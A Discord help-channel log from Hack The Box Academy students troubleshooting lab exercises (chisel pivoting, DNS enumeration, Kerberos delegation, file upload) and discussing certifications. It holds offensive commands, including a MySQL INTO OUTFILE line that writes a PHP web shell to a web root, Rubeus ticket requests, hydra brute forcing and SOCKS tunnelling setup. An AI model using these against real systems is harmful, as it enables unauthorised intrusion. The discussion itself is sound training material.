Also
#modules
fading oracle
yes
orchid pine
Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the answer.
how did you guys answer this question cuz i cannot find the flag on home page on the web server
ther is only index.html
page
fading oracle
i reset the target see what happens
rustic sage
Using the concepts taught in this section, connect to the web server on the inte...
what module and section is this?
rustic sage
did you check the source code / enumerate the web server?
fathom pendant
the pivoting module is like 90% following what they show you exactly ¯_(ツ)_/¯
orchid pine
the pivoting module is like 90% following what they show you exactly ¯\_(ツ)_/¯
no flag XD
orchid pine
did you check the source code / enumerate the web server?
ye si did
rustic sage
hang on i'm redoing the lab for you
fathom pendant
It's this module right? https://academy.hackthebox.com/module/158/section/1425
fathom pendant
And you're doing proxy chains to the internal webserver yes?
orchid pine
yeah
fathom pendant
This one 172.16.5.135:80
orchid pine
127.0.0.1:9050 ... 172.16.5.129:80 ... OK
spare junco
Hello guys, I am new to the system and I can't tell why these two answers are marked as incorrect
fathom pendant
Did you check the hint. Sometimes they're picky about the answer
orchid pine
i shoud of wait for the nmap scan to end
spare junco
Did you check the hint. Sometimes they're picky about the answer
Yes, I did. I actually followed the pattern
rustic sage
okay i figured it out @orchid pine .. sorry that took so long i hate rpivot...
dm and i can help you further
fading oracle
./subbrute.py inlanefreight.htb -s names.txt -r resolvers.txt
i restarted the server
fringe shell
Yes, I did. I actually followed the pattern
you can chain the -c onto the first lot of switches with the first one.
The second you need to do the whole command sudo tcpdump etc.
fading oracle
i found 2 subdomain with dnsenum
but subbrute is just hanging like this for over 5 minutes now
fringe shell
but subbrute is just hanging like this for over 5 minutes now
try -v? can also use -c to increase threads
fathom pendant
https://i.imgur.com/VzcJS1N.png
rejected nameserver
Did you put the ip in resolvers.txt
fading oracle
yes
fathom pendant
And it should really be the only thing in there
fading oracle
just that 1 ip? the other two that i found?
fading oracle
attacking DNS
fading oracle
i found two subdomains with dnsenum on two different ips
fathom pendant
Thats irrelevant youre tasked with finding the subdomains period
One of them will have the answer
you shouldn't have to dive deep
empty notch
FUGE
fathom pendant
FUGE
You OK kid? Do you need a stable figure in your life?
Like I'm genuinely curious how many people you randomly dmed
prime dagger
Anyone know how to use the open VPN I'm new to htb
thorn urchin
Anyone know how to use the open VPN I'm new to htb
just follow the provided vpn instructions
prime dagger
just follow the provided vpn instructions
Ight
empty notch
MARCIELEE DON,T HURT ME PLEAS
fathom pendant
orchid pine
can someone ban this kid
empty notch
SORRY
fathom pendant
Just kindly fuck off :)
empty notch
how do install linux
novel matrix
how do install linux
orchid pine
<@&861185840277487616>
thorn urchin
didnt know he is a mod
what dont know the difference between your green, light green, other light green, and tealish green?
oh and the other other light green
orchid pine
what dont know the difference between your green, light green, other light green...
i said mb
novel matrix
^ gonna have this shit fixed as it's rediculious
fathom pendant
Tbh I think the mod/admin/staff should be in a separate color pool from htb rank
orchid pine
Tbh I think the mod/admin/staff should be in a separate color pool from htb rank
i taught its a rank btw
thorn urchin
i said mb
it was a joke, just ribbing ya, no worries
mostly making fun of all the slightly diff green roles
fathom pendant
^
orchid pine
ig just adding a mod logo with the name it can be much better
vital adder
i did just help someone with the same issue with the automated tool but doing it manually work just fine for him maybe you can try doing this manually
acoustic owl
If you are as successful with it as with DNS, better leave it alone 🤪
Do you still need help?
limber river
dont overthink
quasi wave
is it an unrealistic goal to be able to do insane or hard level HTB Main Platform boxes independently in a few years?
urban sage
I don't think so.
sly dome
totally feasible , always depends on individual
but your statement is not close to unrealistic
a machine that is declared as “insane” can be easier than a “medium” for some people, depending on their knowledge about the whole process to solve it
just start learning and if you keep working day by day and step by step, in 2-3 years you can be quite good
as happens in every field of knowledge
vital adder
is it an unrealistic goal to be able to do insane or hard level HTB Main Platfor...
RafaJurado is right on this, it's completely depends on you and which box you do, E.g for me the new Rebound box isn't that hard because i'm familiar with the core components of that box, but for something like the Response box which you have to create a fucking ssh key out of a screenshot there is no chance my dumb ass can do that even though both box are on the same level
late tapir
Guys how did i get 400 cubes overnight?😆
Cbbh grants you cubes upon completion? Some updates? May be some modules became cheaper?
sly dome
student and anual plans unlock the modules
rustic sage
did you refer a friend or forgot to cancel a subscription?
acoustic owl
Cbbh grants you cubes upon completion? Some updates? May be some modules became ...
Did you do the Intro to Assembly module earlier? I think this module used to cost 500 cubes, now only 100
quasi wave
just start learning and if you keep working day by day and step by step, in 2-3 ...
Ok. Does that mean I could be good at HTB Academy, HTB Main Platform, and four or five types of hacking as taught on Pentester Academy?
late tapir
Did you do the Intro to Assembly module earlier? I think this module used to cos...
Oh yes i did. That must be it. Thanks
sly dome
Ok. Does that mean I could be good at HTB Academy, HTB Main Platform, and four o...
it means that there is nothing unrealistic or impossible in a learning context
quasi wave
it means that there is nothing unrealistic or impossible in a learning context
What I really mean is I want to be good at several types of hacking and you are saying that can be done in 2-3 years. How is that possible? I guess if I work super hard I believe its possible but do people ever actually do that?
sly dome
all i can say is that people that are super good at 1 field are better paid xD
quasi wave
ok thanks
sly dome
dont try to learn everything
quasi wave
so better to just get good at Hack the Box. ok
sly dome
HTB is 1 source of information, its a practice and learning application
quasi wave
Why do people tell me that most penetration testers have several areas of hacking they practice?
sly dome
just start learning and you will discover what you like most
quasi wave
ok
some people tell me to specialize but other people say every serious pentester is familiar with, for-example, hacking wifi networks
sly dome
it can be lot of different things tho, from Offensive to Defensive to non-technical stuff like Risk Management and governance
yes you have to know the fundamentals and basics
but as i said, Red Teamers are the most paid and they know a lot about specifics niches
(in offensive part)
quasi wave
Ok yes. I want to know the fundamentals and the basics of many things but be good at web application hacking, social engineering, and OSINT.
sly dome
well, then go ahead start learning and then try to learn a lot about web pentesting
quasi wave
is Hack the Box a good platform for web pentesting?
sly dome
for sure, but also check Portswigger labs
quasi wave
I'm starting with CPTS just to learn fundamentals. I'm thinking between CPTS and CBBH
sly dome
Best content related to black box web pentesting
is BSCP
but CBBH is super good starting point
sly dome
nice
quasi wave
finished it now on final section of Intro to Nmap module
sly dome
do CBBH path before CPTS
sly dome
because web
quasi wave
ok true
sly dome
also a lot of CBBH modules are also in CPTS' one
its like completing both at the same time
quasi wave
Ya and I want to start bug bounties anyways. Ya I know and vice versa.
sly dome
web pentesting is fundamental nowadays
quasi wave
So CBBH is more fundamental than CPTS?
sly dome
not more fundamental
vital adder
what about pentesterlab?
this isn't a bad choice if you have some free time to do it
sly dome
just necessary to know xD
sly dome
every company who is going to request an offensive pentest will have a web app
or several ones
also bug bounty programs are a good source of income
quasi wave
Aren't bug bounty programs very hard to make a good income on unless you are the best?
sly dome
they are
quasi wave
that's what I keep reading
sly dome
np ! 
quasi wave
I will do CBBH first then ya. I will just finish this Nmap module first and shit but ya good idea.
Then can come back to finish CPTS
will Nmap be useful for CBBH?
sly dome
go on, im working on it if u need smth we are around
quasi wave
thanks
carmine hill
Can I dm you? I’m stuck too
quick crane
Can I dm you? I’m stuck too
do you need help?
quasi wave
hi quick question
is Nmap useful for CBBH?
or will I have to relearn it?
I almost completed the Nmap module that's why
not too big of a deal but I thought I would ask
sly dome
nmap is a port scanner basically, with a lot of functions but not relevant to web pentesting
you're not scanning ports in a web pentest xD
it can be defined in a better way as a network discovery tool
its scripting Lua based engine can be useful sometimes
but i'd rather learn BurpSuite, ffuf and other tools more related to Web pentest
as you can see there are several categories of default scripts that can maybe be useful in a web pentest, but yea not a must to learn for CBBH path
thorn urchin
you're not scanning ports in a web pentest xD
you certainly can be if you're trying to find multiple webapps
sly dome
if they're running on uncommon ports you mean?
the most usual way to host multiple webapps is virtual hosting, since its easier and cheaper
but yea you can find situations where a webapp is running under a random port (we've seen that in a lot of HTB machines)
lunar marsh
Can anyone help me on this , Really appreciate any help , I'm in Introduction to Python3 , Section Conditional Statements and Loops , Question that's killing me is the Last One = What is the result of running the code in "Code block 3"?
fiery berry
Can anyone help me on this , Really appreciate any help , I'm in Introduction to...
what is the problem?
lunar marsh
Cant find the answer to this one But cant RUN the CODE either , it wont go through ????
fiery berry
Cant find the answer to this one But cant RUN the CODE either , it wont go thro...
why you can't run the code? You can do it even online
lunar marsh
Don't Know , for some reason its not going through ??????? Ive tried on different Panels also
fiery berry
Don't Know , for some reason its not going through ??????? Ive tried on differen...
Well I solved it by just reading the code I'm not saying that you need to do so. Anyway you can use something like this to run Python code:
https://www.programiz.com/python-programming/online-compiler/
lunar marsh
Ok will give it a Try THANKS
lunar marsh
Put print in front of it but wont go through , That ONLINE Compler worked
At least the Online compiler worked thanks
GOT IT , THANK YOU AUTOM4il , OWE you A CASE OF BEER
YES SIR THANKS
lapis pelican
The NFS nohide option is giving me hard time. I cannot understand what it means. Googling didn't help.
https://academy.hackthebox.com/module/112/section/1068
sly dome
The NFS `nohide` option is giving me hard time. I cannot understand what it mean...
which module is?
twilit gull
Hello Guys, I'm taking CREST CRT next month. Any suggestions/Advices? Could you please message me in a private chat.
misty current
Hello Guys, I'm taking CREST CRT next month. Any suggestions/Advices? Could you ...
https://discord.com/channels/473760315293696010/482659243456200705 I believe this would be the best place to ask this.
twilit gull
https://discord.com/channels/473760315293696010/482659243456200705 I believe thi...
I'm unable to access that link
analog dock
I'm unable to access that link
Verify your account in #welcome
rotund sorrel
I am currently doing the network enumeration with nmap module -> service enumeration and I'm on the question of " Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer." I have performed a full port scan and found all open ports along with their services. However even after performing || nc -nv *target_ip* *port* ||on every single port while having || sudo tcpdump -i tun0 host 10.10.15.173 and 10.129.183.0 ||open in a different terminal window, I fail to find anything resembling a flag. Can anyone advise? I made sure to wait at least 1 minute per each nc command before moving on to the next
Note that I am receiving some logs in my tcpdump when I ||nc -nv *target_ip* *service_port*|| but I dont get any sort of flag
what the fuck doing the same thing thrice worked, I hate it here
tender acorn
fathom pendant
Then submit the error to #858470491676737536 with a suggested fix
ornate dust
Hi there 🙌🏻 I’m interested in taking on the Penetration Tester Job Role Path Training on the platform. Is the any cost or fees involved?
rustic sage
Hi there 🙌🏻 I’m interested in taking on the Penetration Tester Job Role Path T...
the exam itself costs $210
then you have to unlock the modules which does cost money. cheapest path is if you’re a student, which unlocks everything (while subscribed) for $8/mn
it’s still cheaper than other certs on the market
ornate dust
the exam itself costs $210
then you have to unlock the modules which does cost...
Yeah.. Thanks 🙏🏼 for student, means you need a “edu” mail domain?
rustic sage
so if you sign up with a .edu you should have access to that tier automatically, if not you’ll have to message support to see if it’s a valid college/university.
ornate dust
so if you sign up with a `.edu` you should have access to that tier automaticall...
Alrite. Thanks for the infos. 🫡💯
rustic sage
Hello everyone, i have a question about a windows system, what is difference betwen lsass and system/sam? Why i cant read a hash of a user that is not logued in lsass but in system/sam i can? Please help me!
hallow kiln
I'm on Attacking Common Services, attacking FTP, got a username and password and a flag, but none of those are accepted as answers, any chance I could DM someone to double check so I don't spoil things here?
somehow I got the details for the next section on SMB instead...
nevermind, I got it
rustic sage
can somebody help how to get CLSID for JuicyPotato running script \testclsid.bat in Windows Privilege Escalation Skills Assessment - Part I . i dont get any output
plucky nimbus
Hi everyone, im doing the Linux Privilege Escalation and doing the Logrotate box. I know what i need to do but the exploit rarely works. Nothing gets written i /etc/bash_completion.d/ and if it does its usually an empty file that i can't write anything into. Anyone else had a similar problem?
leaden pond
i did just help someone with the same issue with the automated tool but doing it...
I was able to get the flag using the manual approach. I'm not sure what I did differently to get it to work. I just tried it three times, and it finally worked. I think maybe I had too many tabs in the XML code I added to the POST request. In any case, thanks for your help!
rain briar
im starting to see some of these boxes just dont wwork correctly
im trying to SSH into a machine that the problem is tellign me to and it keeps saying permission denied
havent even entered the passsword yet
hallow kiln
the error you get should be telling you what the issue is
vague fossil
are there more resources for ctf style games with pcaps i can analyze? the network analysis module was fun
hallow kiln
I did the lab earlier today, it works as it should
rustic sage
are there more resources for ctf style games with pcaps i can analyze? the netwo...
you could look at the forensic challenges on HTB's main platform🧐 i know some of those involve pcaps
vague fossil
oooh cool thanks
rustic sage
im trying to SSH into a machine that the problem is tellign me to and it keeps s...
do you want to dm me? we can try to diagnose what's going on
rain briar
yA
fading oracle
Hi! Guys! i am doint the Attacking Common Services Easy lab. I managed to get user and password, logged into mysql, found the cve to upload shell.
SELECT "<?php system($_GET[‘cmd’]); ?>" into outfile "C:\xampp\htdocs\1.php";
i used this command to upload it
i cant acces the shell though
what did i do wrong?
orchid pine
SELECT "<?php system($_GET[‘cmd’]); ?>" into outfile "C:\\xampp\\htdocs\\1.php";
U need to escape the back slash
////
slate creek
I dot the exact same thing but still arent able to find Kira's password, I mutated Kira's password from hint using hashcat. and ran hydra -l Kira -P kira-mut.txt ftp://10.129.188.235 -t 48. Can you give me a tip pls
gloomy bramble
i tried both ways doesnt work
recheck your c: syntax
orchid pine
can you give more hint pls? <@403912073161211904>
C:\\xampp\\htdocs\\backdoor.php';
limber river
https://i.imgur.com/m2qyIoQ.png
What web shell did you use?
fading oracle
thx
fading oracle
What web shell did you use?
limber river
if you want to dm i can help you further
I use mysql and it works for me
limber river
https://i.imgur.com/0VLIQhU.png
Try dir C:\
rustic sage
i'm sure the mysql way works, but like i said it's not necessary if it's not working
limber river
i'm sure the mysql way works, but like i said it's not necessary if it's not wor...
Idk maybe there's other ways
rustic sage
there is 😉
fading oracle
Try dir C:\
not working
civic terrace
for disregard, operator error
Web Attacks - Blind Data Exfiltration I got the flag but academy isn't accepting it. Checked for spaces in the answer field etc. is it a decoy flag or a bug maybe?
had the wrong file path in my code
analog dock
not working
Are you sure you’re uploading to the right path?
lost plume
Hello everyone, please help me with the skill assessment in the Kerberos attack module. I can't solve the last question. I tried all the vairants, but I either get access denied or the plan is not working. I realized that this is Unconstrained Delegation through the computer and that I need to somehow use the jake ticket. When I request a service ticket on cifs, I receive it, but as I said, I am denied access. The hint that came with the task was more misleading. Please tell me what I'm doing wrong or which way to think.
1.Rubeus.exe monitor /interval:5 /nowrap
2.Rubeus.exe asktgs /ticket:j*** /service:cifs/dc01.il.loc /ptt
3. renew
4.dir \dc01\c$ <= access is denied
fading oracle
Are you sure you’re uploading to the right path?
yes.
on the webpage FAQ it says xampp/htdocs
gloomy bramble
did you check your c: syntax?
fading oracle
i did i tried it like 6-7 different ways
am i this stupid tell me?
or what am i not seeing
analog dock
Try / instead of \ maybe
fading oracle
tried that also
analog dock
https://i.imgur.com/0VLIQhU.png
I think you’re single quotes around cmd are messed up too
Need '
<@&861185840277487616>
In #858470491676737536 too
urban sage
<@&861185840277487616>
Dealt with.
analog dock
Dealt with.
fading oracle
I think you’re single quotes around cmd are messed up too
i tried it with both single and double quotes
analog dock
i tried it with both single and double quotes
The single quotes in your screenshot aren’t good
You use ‘ instead of '
Got it?
analog dock
Alright, let me know
fathom pendant
Try dir C:\
No you're meant to upload to the web root on this one
fading oracle
yes i think because of i copy pasted it from a CVE
analog dock
lost plume
Hello everyone, please help me with the skill assessment in the Kerberos attack ...
so, who thinks that he is a potato and will face the same problem, here is an instruction for you, do not use the C drive and you are doing everything right
analog dock
so, who thinks that he is a potato and will face the same problem, here is an in...
You need the secret share, you don’t have access to c
hallow kiln
so, for the second time, pass-the-hash with xfreerdp works only from the pwnbox for me, does anyone have any ideas as to why that might be?
analog dock
Sorry, I didn’t see your question
quiet ember
Is the Linux attack host given in the active directory module joined to the domain?
lost plume
You need the secret share, you don’t have access to c
exactly, I already guessed)
analog dock
exactly, I already guessed)
🤘🏽
You could’ve also checked with psexec
It would’ve shown the available secret share
misty current
so, for the second time, pass-the-hash with xfreerdp works only from the pwnbox ...
what error do you get when you xfrdp from vpn?
lost plume
It would’ve shown the available secret share
cool, I'll try it, thanks)
hallow kiln
what error do you get when you xfrdp from vpn?
it just demands the password anyway even though I've added the required registry key
but works without issue from the Pwnbox
fathom pendant
it just demands the password anyway even though I've added the required registry...
Try not running it as root
hallow kiln
Try not running it as root
thanks for the suggestion, this is what I get
fathom pendant
I had that issue with xfreerdp before I forget how I permanently fixed it
Ik you can set the $DISPLAY variable to 1 which should work
analog dock
thanks for the suggestion, this is what I get
hallow kiln
strange, followed the steps but keep getting the error
silver mesa
Hi, Anyone can help me with the Skills assessment file upload
so far,
I have found the source code of upload.php file with XXE attacks. stuck on upload the php code.
misty current
strange, followed the steps but keep getting the error
Display name could be different. Also, just in case, what machine are you using?
hallow kiln
Display name could be different. Also, just in case, what machine are you using?
Kali Linux VM
hallow kiln
yeah, I'm googling and trying to find a solution
fathom pendant
Could also be a case of uninstall/reinstall
Because the password portion really should pop up in gui
rustic sage
Hi, Anyone can help me with the Skills assessment file upload
so far,
I have fo...
if you want to dm i can help 🙂
silver mesa
if you want to dm i can help 🙂
Thanks
last quarry
Hi guys I have a problem with the module named "Introduction to assembly language"
I'm at the functions section, I tried to run the code with this given command
nasm -f elf64 functions.s && ld functions.o -o functions -lc --dynamic-linker /lib64/ld-linux-x86-64.so.2 ./functions
But when I try to open it with gdb, I have that error : functions.s:(.text+0x23): undefined reference to “printf”
how can I fix that ?
hallow kiln
oh well, can't find a fix, hope that doesn't screw me over on the exam
last quarry
oh well, can't find a fix, hope that doesn't screw me over on the exam
So how did you made to do the skill assessments ? 😅
hallow kiln
So how did you made to do the skill assessments ? 😅
it works on the pwnbox, I just really hate using it
misty current
it works on the pwnbox, I just really hate using it
Did you try to reinstalling xfreerdp
hallow kiln
Did you try to reinstalling xfreerdp
now I did, it resulted in extra errors 🥲
unless someone knows first-hand how to fix it, it's best I not experiment anymore in case I end up not being able to use it at all
analog dock
@hallow kiln is your system updated?
misty current
now I did, it resulted in extra errors 🥲
xD damn
tight mesa
hello everybody, I'm doing the chisel exercise into Pivoting module, and I'm receiving this error message in the jump host:
can I ask you how did you solved it?, had to download the lib file then upload to the jump host or what?
sly dome
strange, followed the steps but keep getting the error
if you do xdpyinfo what do you get?
ah you did it
i solved it someway for an INE lab
maybe try from Parrot OS
hallow kiln
<@752921660834709594> is your system updated?
yup, I keep it updated
analog dock
yup, I keep it updated
What error does it give now
hallow kiln
maybe try from Parrot OS
it works from the Pwnbox, I'm not ditching Kali for Parrot cause of one tool though
sly dome
from my experience Kali Linux has given me a lot of problems with several tools 🤷
hallow kiln
What error does it give now
all of this before logging in normally with a password, same as before when trying to pass the hash
analog dock
all of this before logging in normally with a password, same as before when tryi...
Can you restart your machine, and reset the target?
hallow kiln
Can you restart your machine, and reset the target?
I had the same issue with another target a day or so ago, it's not that
hallow kiln
from my experience Kali Linux has given me a lot of problems with several tools ...
I've heard Parrot can be pretty buggy too tbh, it's all personal preference in the end
hallow kiln
I doubt that
sly dome
it’s weird that for some people Kali is not viable and Parrot is, and vice versa
this thread has some interesting posts
btw do you have a desktop installed?
mossy hatch
Active Directory Terminology section in intro to AD is infinite
tight mesa
has this type of error happened to anyone?
sly dome
you are trying to run a go file btw
read the documentation at least
one option is to compile it yourself go build <main go file> -ldflags="-s -w"
flags are for size reduction
or download compiled binaries according to the system
tight mesa
Did you install it properly per instructor
yes, I did
tight mesa
one option is to compile it yourself `go build <main go file> -ldflags="-s -w"`
done, also upx brute chisel
tight mesa
now the binary is 3.3MB
sly dome
but you can’t run a go file
is a compiled language
./chisel if you run it you should be getting the help panel
tight mesa
one sec, when you say "Use the binary obtained" you mean just move to jump host the chisel file not the the whole folder?
sly dome
one sec, when you say "Use the binary obtained" you mean just move to jump host ...
do you even know what is a compiled language
tight mesa
go
fathom pendant
That wasn't the question lol
sly dome
i think it has to be really well explained within the module
that you have to upload the binary
and run there in client mode
fathom pendant
^
sly dome
as usual read better 🤣
tight mesa
ok., let see what I'm doing wrong or misunderstanding in the documentation:
Cloning into 'chisel'...
remote: Enumerating objects: 2269, done.
remote: Counting objects: 100% (107/107), done.
remote: Compressing objects: 100% (75/75), done.
remote: Total 2269 (delta 50), reused 66 (delta 28), pack-reused 2162
Receiving objects: 100% (2269/2269), 3.50 MiB | 5.32 MiB/s, done.
Resolving deltas: 100% (1075/1075), done.
2.- cd chisel
go build
go build -ldflags="-s -w"
du -hs chisel
7.9M chisel
3.- upx brute chisel
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2020
UPX 3.96 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 23rd 2020
File size Ratio Format Name
-------------------- ------ ----------- -----------
upx: brute: FileNotFoundException: brute: No such file or directory
8257536 -> 3309780 40.08% linux/amd64 chisel
Packed 1 file.
4.- du -hs chisel
3.2M chisel
5.- scp chisel ubuntu@10.129.183.15:~/
ubuntu@10.129.183.15's password:
scp: /home/ubuntu//chisel: Is a directory```just share it with a http server
tight mesa
ok.
sly dome
php -S 0.0.0.0:80
fathom pendant
You need to do -r btw to scp a directory
tight mesa
You need to do -r btw to scp a directory
I know, but if move the whole directory is not working either
tight mesa
or scp ./chisel which indicates a file
hmm ok., let me try it
fathom pendant
Also your upx failed
tight mesa
why?
fathom pendant
Read what you sent and you tell me
Your upx is reading "brute" as a file
Which is giving the file not found error
tight mesa
ok. looking in the ippsec video, he got the same message
and got a similar compression ratio
sly dome
you have to run it as a flag
upx —brute chisel
ippsec is human and as human he can be wrong
sly dome
you got one chisel file that weights 3.2M just upload it to the pivot machine 😭
it isn’t that difficult you got it
fathom pendant
^
tight mesa
it isn’t that difficult you got it
it's not....
i followed to you....
now I'm receiving this error message:
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel)
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./chisel)```what is WEB01?
fathom pendant
Try downloading an older version of chisel
sly dome
what is the architecture of WEB01 machine?
tight mesa
Linux WEB01 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
tight mesa
Try downloading an older version of chisel
v1.9.1 is the latest, what is your recomendation?
fathom pendant
An older version idk which exactly
tight mesa
ok
rustic sage
how do you get HTB pro hacker role inside this server?
sly dome
also post it in erratum
supple patio
how do you get HTB pro hacker role inside this server?
By doing boxes
sly dome
WEB01 needs to be updated
rustic sage
By doing boxes
in this server
supple patio
in this server
Read #welcome
rustic sage
Read <#477042232109826048>
👍
supple patio
now I'm receiving this error message:
```ubuntu@WEB01:~$ ./chisel --help
./chis...
Can you show please which version and type of chisel did you install?
I mean sometimes versions like arm64 don't work properly
sly dome
which should work
supple patio
I downloaded 1.8.1 and works, thanks btw
Great
sly dome
if you build it static, the binary does not rely on system libraries
sly dome
I downloaded 1.8.1 and works, thanks btw
good enough
tight mesa
Can you show please which version and type of chisel did you install?
the module route you to https://github.com/jpillora/chisel and the version is 1.9.1
supple patio
the module route you to https://github.com/jpillora/chisel and the version is 1....
Got you, in my case it did work🙂
sly dome
coz probably you used 1.9.0 or earlier one
the module just needs an erratum
the 1.9.1 is quite young
tight mesa
ok., did you apply the go build -ldflags="-s -w" and then upx brute chisel ..???
sly dome
from Aug 23rd
supple patio
coz probably you used 1.9.0 or earlier one
No, 1.9.1
supple patio
the one from releases works?
Yeah
thorn urchin
now I'm receiving this error message:
```ubuntu@WEB01:~$ ./chisel --help
./chis...
just compile is statically
supple patio
its weird how is working for you? because WEB01 is the same for everyone
No idea
supple patio
are you sure you are talking about WEB01’
Wait a while, which module is it?😂
tight mesa
Pivoting, tunneling and port forwarding
supple patio
Pivoting, tunneling and port forwarding
Okay, if this one, it was always working
1.9.1
sly dome
cant be 🤷
sly dome
maybe there are different instances of WEB01
tight mesa
ok., my question is, did you have to reduce the binary size or just copied to jump host?
thorn urchin
there isnt
golang changed how binaries are built
and now people need to learn how to statically compile
supple patio
ok., my question is, did you have to reduce the binary size or just copied to ju...
No, just scp
supple patio
but the one from releases works
Yeah, the amd64
tight mesa
No, just scp
ok., you moved the original binary, understood
sly dome
the compression does not matter
thorn urchin
when did golang change?
idk just a couple months back is when I started seeing everyone complain about GLIBC when transferring gobins to targets
sly dome
the one from releases is compressed
thorn urchin
learn to statically compile though and youll be fine for just about any tool, not just chisel
sly dome
the releases one is from Aug 23rd
supple patio
ok., you moved the original binary, understood
I was doing the same stuff which was mentioned in password attacks module, but with the newest version of chisel
balmy pelican
Don't know if this is the right channel to ask but
Would you advise beginner users (like myself) to use guided mode when doing machines?
tight mesa
sweet
sly dome
how is working for one guy and not for another
supple patio
how is working for one guy and not for another
Life is strange)))
thorn urchin
Dont know, dont care. Its a very solvable problem with three seconds of google
sly dome
it should not work for T3p3s if WEB01 is the same machine
thorn urchin
CGOENABLED=0 go build -ldflags="-s -w -linkmode 'external' -extldflags '-static'"
sly dome
or the releases one is statically compiled
thorn urchin
Youre thinking way too hard about this
sly dome
i want to understand how it works for one person and not for another
thorn urchin
Heres a hint: someone fucked up
sly dome
HAJAJAJA
thorn urchin
Its not worth losing sleep over
thorn urchin
theres a correct known solution to the issue
sly dome
lets continue with our day
thorn urchin
exactly
hazy grotto
theres a correct known solution to the issue
Madfox can i DM you with an issue i'm having with pivot module?
orchid pine
ok., you moved the original binary, understood
what did u use to bypass the error
tight mesa
what did u use to bypass the error
I downloaded an older version of chisel and moved to the jump host, BUT I'm gonna try it with the latest release as well
last quarry
oh well, can't find a fix, hope that doesn't screw me over on the exam
Update, I think it cannot be opened with gdb. We use C fonctions in .asm or .s extension so gdb is lost because we use printf inside a ASM file
I think that the only way to execute it is with the given command. But we cannot inspect memories affectation.
Why I think that ? Because when I inspect the executable file with GDB I didn't have any errors and I can inspect the executed code
orchid pine
can some one tell me what im doing worng
tight mesa
can i dm you
yes u can
orchid pine
the server is on your attacker machine
what i should run the server on the attack host
sly dome
as usual in pivoting xD
orchid pine
wait
im confused
Running the Chisel Server on the Pivot Host
Running the Chisel Server on the Pivot Host
ubuntu@WEB01:~$ ./chisel server -v -p 1234 --socks5
2022/05/05 18:16:25 server: Fingerprint Viry7WRyvJIOPveDzSI2piuIvtu9QehWw9TzA3zspac=
2022/05/05 18:16:25 server: Listening on http://0.0.0.0:1234
orchid pine
this is on academy i need to start the server on the pivot
sly dome
well idk then
but it is really weird because the client is the one who redirects the traffic
orchid pine
but it is really weird because the client is the one who redirects the traffic
im so confused right noiw
sly dome
and the proxychains ALWAYS is the same machine than the server
or the module is wrong or you are missing something
void shadow
but it is really weird because the client is the one who redirects the traffic
I guess the server provides the traffic to client
sly dome
the server just listens
orchid pine
cuz he is the server on this sitaution
sly dome
i’ve always done server in my attacker machine and client on pivot
void shadow
Then you need reverse mode activated
sly dome
yea
void shadow
Also provide fingerprint on client
sly dome
but reverse flag in chisel is for reverse forwarding
iirc
i dont use chisel since i discovered ligolo-ng
sly dome
--reverse, Allow clients to specify reverse port forwarding remotes in addition to normal remotes.
this?
void shadow
Yea
void shadow
Idk
sly dome
can some one tell me what im doing worng
i see you did not specify a port in the client
wintry basin
Hi, can you give me a hint please. I am having same problem
misty current
can some one tell me what im doing worng
Resolved?
sly dome
its missing the port in the client such as PORT:socks
misty current
It’s because that 5**** port is just an arbitrary port which is selected at random for a connection
orchid pine
the connect established 2023/09/27 20:03:22 server: session#2: Handshaking with 10.10.15.56:36938...
misty current
the connect established 2023/09/27 20:03:22 server: session#2: Handshaking with...
Not the port for your socks.
The port for connecting to socks should have showed in your client output
Not in server.
In your case, it didn’t (not sure why)
But by default chisel chooses 1080 and you could have seen it with ss tulpn command
misty current
I believe you also have an option to choose a port for your socks proxy
orchid pine
ok then
orchid pine
there is a differnce between the port that use proxy to forward the packet and the one used to eastablishc onnection
┌──(shadowalker㉿kali)-[~]
└─$ ./chisel_1.8.1_linux_amd64 client -v 10.129.250.155:1234 socks
2023/09/27 15:03:21 client: tun: Bound proxies
2023/09/27 15:03:21 client: Handshaking...
2023/09/27 15:03:22 client: Sending config
2023/09/27 15:03:22 client: tun: SSH connected
sly dome
ofc
i told tou the syntax
PORT:socks
instead of just socks
and declare the same PORT in proxychains conf
misty current
there is a differnce between the port that use proxy to forward the packet and ...
A communication established is just a handshake (tcp in this case) it chooses a random port for that establishing the connection. Tldr yes.
orchid pine
now i understand
thank you guys
for make things clear for m,e
the proxy is using another port to frward the traffic to the sevver side
sly dome
thats the intention behind this server
orchid pine
thx
quasi wave
is Nmap useful for bug bounties? I am finishing Nmap module but I just want to make sure I didn't waste my time if I'm switching to finish CBBH first before doing rest of CPTS
because I don't want my time learning Nmap to be wasted
just subscribed to HTB Main Platform so I guess I can practice Nmap there even in web application heavy boxes right?
sly dome
anyways you’re gonna need the nmap module
quasi wave
even in the bug bounty path?
sly dome
in your whole career
quasi wave
ok thanks
right ok I know that but I want to make sure I keep using my Nmap skills so I don't forget
and I'm scared if I switch to CBBH I will forget. However, I also want to do bug bounties
to get some real world experience and have something to put on my resume
and because I'm interested in hacking websites anyways and bug bounties let me do that legally and safely
sly dome
you wont forget nmap skills
lusty thicket
right ok I know that but I want to make sure I keep using my Nmap skills so I do...
take good notes
sly dome
also you do not need to know every single flag and option from nmap by heart
quasi wave
I have taken notes on entire Nmap module
sly dome
you have Google and manuals
quasi wave
also you do not need to know every single flag and option from nmap by heart
ok thanks
quasi wave
you have Google and manuals
true true ok
sly dome
it is ok to use google
quasi wave
ok cool ya
sly dome
it is ok to ask questions to others
quasi wave
ok ya I see
sly dome
finish the module and continue with cbbh
quasi wave
ok thanks
sly dome
in cbbh we do not use nmap
quasi wave
Ok thanks. Would it be good to do PentesterLab on top of CBBH?
to reinforce skills?
I'm already subscribed to HTB Main Platform
so I'm just wondering
sly dome
dont try to learn and use all platforms
the required knowledge for CBBH is within the HTB academy
just set a goal
for example, CBBH or CPTS
when you get it you can go for another source of knowledge, usually certifications are a good source of knowledge
quasi wave
ok so is doing HTB Main Platform and Academy both a bad idea? My goal for the next two years is to get through CBBH and CPTS and earn both certs
maybe to go beyond that
sly dome
no but id stick to academy first
sly dome
boxes challenges and tracks on the main platform are a very good way to test your knowledge
but day is limited to 24h
you cant do all
quasi wave
Ok, so ya point taken.
quasi wave
so should I cancel HTB Main Platform subscription?
